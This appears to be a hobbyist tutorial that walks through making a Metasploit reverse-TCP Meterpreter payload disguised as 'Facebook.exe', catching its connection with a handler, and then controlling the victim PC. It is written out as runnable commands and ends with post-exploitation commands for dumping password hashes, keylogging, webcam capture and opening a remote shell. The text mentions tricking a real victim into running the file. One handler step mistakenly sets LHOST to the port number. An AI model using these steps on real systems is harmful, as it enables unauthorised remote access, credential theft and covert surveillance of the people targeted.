Victim PC = My host machine running Windows 7
Victim PC IP address = 192.168.0.30
Hacker PC = VMWare Workstation running a BackTrack 5 virtual machine
Hacker PC IP address = 192.168.72.130
To get started, we're going to open up a terminal in Back Track and navigate to the Metasploit directory. The command to do this is cd /opt/framework/msf3
Next we're going to create our payload and export it into an .exe file that we will use to make the connection between the hacker and victim. The command to create the payload is ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.72.130 LPORT=4444 x > /root/Desktop/Facebook.exe
Note: in this command you will replace the address of MY hacker PC (192.168.72.130) with the address of YOUR hacker PC. Leave everything else the same
This command will create the file called Facebook.exe and place it on the Desktop of our Back Track VM. In a real life scenario at this point you'd have to figure out a way to get that file onto the victim's PC and get them to run it. However in this case I'm just going to drag the file out of my virtual machine and onto the desktop of my host machine (DO NOT RUN Facebook.exe YET!) You should be at this point now:
So now the setup phase is done - we've created our payload, figured out a way to get the file onto the victim's computer and now we are ready for the actual exploit to take place.
At this point you're going to use the command ./msfconsole to launch Metasploit. This may take a while to load especially if it's your first time launching the program. After Metasploit launches you should see a screen similar to this:
Now we're going to type the command use exploit/multi/handler and press Enter. Then we will type set LHOST 192.168.72.130 and press Enter. Then type set LHOST 4444 and press Enter. Again, remember to change the address to match that of your OWN hacker PC, leave the port number the same.
Now if you type the command exploit and press enter, Metasploit will launch the payload handler. What this does is opens up a connection to our hacker machine on port 4444, and awaits a connection from the victim's PC (which is created when they open the Facebook.exe file).
So at this point your screen should look like this:
Now the fun begins...if you now double-click on the Facebook.exe file we copied to the Windows 7 victim PC, the payload handler in Metasploit will receive the connection and connect you to the victim PC. You should see something like this:
You now have a Meterpreter prompt which essentially gives you control of the victim's machine. You can issue the command help at the Meterpreter prompt for a list of some of the cool things you can do to the victim but here is a list of the more common ones:
sysinfo - get basic system info
hashdump - dumps the SAM database
screenshot - takes a screenshot of the victims desktop
webcam_snap - takes a web-cam shot of the victims desktop
keyscan_start - start key-logging
keyscan_dump - dump the keystrokes (after using keyscan_start)
ps - list all running processes
shell - gives you a command shell to the victims PC
So that's pretty much it...this is just one of the many ways to exploit a machine using Metasploit. Let me know if you have any questions or commentss
